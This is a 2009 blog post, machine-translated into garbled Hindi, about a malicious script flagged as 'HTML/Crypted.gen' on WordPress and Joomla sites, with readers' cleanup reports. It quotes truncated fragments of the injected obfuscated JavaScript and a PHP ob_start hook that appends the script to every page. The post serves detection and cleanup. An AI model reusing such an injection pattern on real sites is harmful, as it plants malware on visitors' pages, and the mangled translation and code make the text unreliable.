imaginepaolo, छवि कोई दीवार है




2009 / novembre / HTML/Crypted.gen attacca WordPress e Joomla ब्राउज़ करें: गृह / 2009 / नवम्बर / HTML / Crypted.gen हमलों से WordPress और Joomla

HTML / Crypted.gen हमलों से WordPress और Joomla

12 नवंबर को 7 2009 (12,605 विचारों) टिप्पणी

: अंतर्गत वर्गीकृत समाचार

को imaginepaolo लिया जा हमले की दिलचस्प व्याख्या http://www.settorezero.com/ :

यह अधिक बार हाल ही में हो रहा है, कि कई WordPress और Joomla पर आधारित साइटों, किसी तरह से सूचना दी ट्रोजन ने हमला कर रहे Avira के रूप में "एचटीएमएल / Crypted.gen". मैं अगर यह इन दो प्रकाशन सिस्टम में मौजूदा कीड़े (लेकिन मुझे शक है) के साथ है या नहीं बल्कि एक वायरस है कि सर्वर है कि इन साइटों को होस्ट द्वारा हमला एक समस्या है नहीं बता सकता.

उत्तरार्द्ध परिकल्पना मैं सच है कि सब लोग मुझे संपर्क किया और जो एक ही समस्या थी हैं द्वारा समर्थित किया गया, वे सब एक ही होस्टिंग प्रदाता पर. क्या चाल है क्योंकि यह काफी असामान्य है और मुझे संतोषजनक सूचना नेटवर्क नहीं मिला है ताकि एक मान्य धारणा बनाना है, तो मेरा ही मान्यताओं रहे हैं और इस तरह के रूप में लिया जाना चाहिए नहीं अब के लिए भी शुल्क नहीं.

मैं इस बीच में उम्मीद है कि इस पोस्ट उपयोगी और समझने की जहां समस्या के स्रोत पर चर्चा की जा सकती है.

पहली और महत्वपूर्ण बात कहना चाहता हूँ कि वायरस एक्सटेंशन HTML, PHP, ASP और जे एस के साथ पृष्ठों (लेकिन हमेशा नहीं साइट के सभी पृष्ठों) बदल, एक एन्क्रिप्टेड जावास्क्रिप्ट कोड है कि इस तरह से अधिक या कम शुरू होता है जोड़ने से है: 

  "javascript" > $a = \ "Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0} <script भाषा = "javascript"> $ एक = \ "Z64dZ3dZ22q | अगर | qdu] qwys ^ ई}} rub8tqiZ3c0

मैं "कम या ज्यादा" क्योंकि हर कोई नहीं दिखता है उसी तरह, तथापि, यह आसान करने के लिए दुर्भावनापूर्ण कोड की पहचान, के रूप में हम देखते हैं, क्योंकि कुछ हद तक अस्पष्ट है कहते हैं: खोजशब्दों को पढ़ा है, लेकिन न केवल चरित्र दृश्यों बेतुका लग रहे हैं.

गोपनीयता के संबंध में, तथापि, दुर्भावनापूर्ण कोड आमतौर पर हर पृष्ठ "index.php" पर डाला जाता है और इस तरह से शुरू होता है: 

  1 
  ( "security_update" ) ; function security_update ( $buffer ) { return $buffer . "<script language= \" javascript \" > $a = \" Z64dZ3dZ22q|se|qdu]qwys^e} <Php ob_start ("security_update");? समारोह security_update ($ बफर) {. $ बफर वापसी "<script Language= \" जावास्क्रिप्ट \"> $ एक = \" Z64dZ3dZ22q | अगर | qdu qwys] ^ और}

ऐसा लगता है कि स्क्रिप्ट क्षति का कारण नहीं है और केवल Avira (पूछें) के द्वारा पाया. समस्या स्क्रिप्ट पृष्ठों के हानिकारक प्रभाव को नष्ट करने, या सर्वर पर पृष्ठों की एक स्वस्थ प्रतिलिपि चार्ज द्वारा हल है.

कुछ उपयोगकर्ताओं के लिए, तथापि, एक वायरस के होने के बाद, वे (या अन्य वेब पृष्ठों) साइट इस समस्या के साथ अपने पीसी पर संग्रहीत की एक कॉपी मिल गया है, तो हमले के लिए "स्थानीय" और नहीं दूरदराज लगता है: पन्नों को संलग्न होने लगते हैं एक ही पीसी पर वे जो में रहते हैं. इससे मुझे लगता है कि यह तेजी से एक होस्टिंग समस्या है: वास्तव में आपके कंप्यूटर पर कई संक्रमित साइट की एक नकल है, और सर्वर इस स्क्रिप्ट पृष्ठों पर मौजूद रहा.

करने के लिए आप हमेशा ढाल करने में सक्षम हो समाधान के लिए अपने और अपनी वेब साइट को पीसी के आदेश पर अपनी साइट के एक मौजूदा बैकअप है अगर हम नहीं प्रदान किया गया.

मैं यहाँ कुछ उपयोगी (ज्यादातर गोपनीयता पर) लिंक प्रस्तुत समस्या से संबंधित बोली:

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://www.wordpress-it.it/forum/topic/12452

2.8.5 WordPress, 100 से अधिक अरूबा पर हैकर हमलों

संबंधित पोस्ट

  • कोई संबंधित पोस्ट


घोषणा

वेब डिजाइन एजेंसी




को "एचटीएमएल / Crypted.gen हमलों से WordPress और Joomla" 7 प्रतिक्रियाएँ

  1. प्रोदी और स्पेन में इतालवी आप्रवासियों के सपने. , नेटवर्क "द्रोही" कहते हैं:
    10 दिसंबर, 14:01 पर 2009

    [...] Bland खतरा - ऐसा लगता है, वास्तव में, यह लगभग तुरंत पता लगाया एक ही Avira सही होने के लिए (और खतरा नहीं है [...]

  2. अपूर्ण माँ लिखते हैं:
    23 जनवरी, 22:31 पर 2010

    मुझे 20 दिनों में दो बार हुआ. : डी

  3. Arianna लिखा है:
    January 25, 16:02 पर 2010

    यह मेरे लिए पिछले साल नवंबर में एक समान आक्रमण (याद अगर कोड ही नहीं था सकता है) हुआ.
    मैंने पाया और WordPress के साथ दुर्भावनापूर्ण कोड एंटीवायरस प्लगइन हटा दिया. लेकिन मैंने किया था, मैंने पढ़ा था जो सबसे अच्छी बात थी: मैं सब कुछ reinstalled विषय प्लगिन से, मैं भी यूआरएल और पासवर्ड बदल दिया है. तब से, और अब के लिए, सब कुछ ठीक है ... लेकिन मैं चुपचाप कहते हैं.

    हैलो!

  4. Valentina ने लिखा:
    मार्च 9, 2010 16:21 पर

    मैं कोड है कि आप प्रदान की है की लाइनों के लिए देखने की कोशिश कर रहा हूँ, लेकिन अभी भी कुछ नहीं. मैं अपने सभी ब्लॉग अलग डाउनलोड सार्वजनिक फ़ोल्डर और mdb डेटाबेस से.
    : (

  5. असुरक्षित वॉल्यूम ?!... - Page 2 - Vespaonline लिखते हैं:
    March 18, 20:22 पर 2010

    नमस्ते नमस्ते [...] टर्बो Joomla के मंचों पर तलाश की कोशिश करो, दूसरों को एक ही समस्या है. HTML / Crypted.gen हमलों से WordPress और Joomla | वेब डिजाइन [+ सवाल हल] html / crypted.gen HTML / Crypted.gen हमलों से WordPress और Joomla | उद्योग [...]

  6. लुईस लिखते हैं:
    March 20, 19:38 पर 2010

    शुक्रिया!
    मैं स्क्रिप्ट को हटाने से समस्या हल.
    उन्होंने सभी सूचकांक पृष्ठों, यहां तक ​​कि उन index_1 में मनोनीत किया गया. index_old, पुराने परिवर्तन की प्रतियां.

    एक बार फिर धन्यवाद ... मैं तुम्हें एक एहसान एहसान : पी

  7. न्यूविल लिखते हैं:
    28 जुलाई 2010 23:38 पर

    नमस्कार,
    एक ही बात मेरे साथ हुआ, अरूबा में पहली बार (प्रदाता) नहीं है, लेकिन यह 7 या 8 बार था: लगता है कि यह हमलों विरोधी वायरस सेवा वैकल्पिक और देय है बेचने के लिए लक्षित है शुरुआत: जाहिर है प्रदाताओं के प्रकाश की गति बदल जाएगा.

    मेरा शक काफी तथ्य है कि पिछले हमले के बाद से मैं plugins सक्रिय की संख्या सीमित है (सभी "प्रमाणित" और wp.org से डाउनलोड) और मैं इस बिंदु पर टेम्पलेट खुद ... बनाया के बाद से, के लिए भी उचित है, समस्या ही कभी किया गया है अरूबा द्वारा साइटों की मेजबानी मैं हर गर्मियों में संदेह का कारण है ... बहुत बुरा पर केंद्रित है, लेकिन अगर मैं सप्ताहांत में मैंने एक और होस्टिंग खरीदा जा सकता है. अगर आपके पास किसी भी सुझाव का स्वागत है

    मुझे नहीं लगता कि यह WordPress में एक जोखिम है, मैं 2.9.2 संस्करण है, जो एक समय 'के लिए अच्छी तरह से चला गया और स्थिर है (वास्तव में मैं हमलों के डर के लिए 3 में नवीनीकृत नहीं किया था) है

एक टिप्पणी छोड़ दो



"
"

यह साइट खोजें गूगल




क्रिएटिव कॉमन्स लाइसेंस
इस काम के अंतर्गत लाइसेंस प्राप्त है क्रिएटिव कॉमन्स लाइसेंस .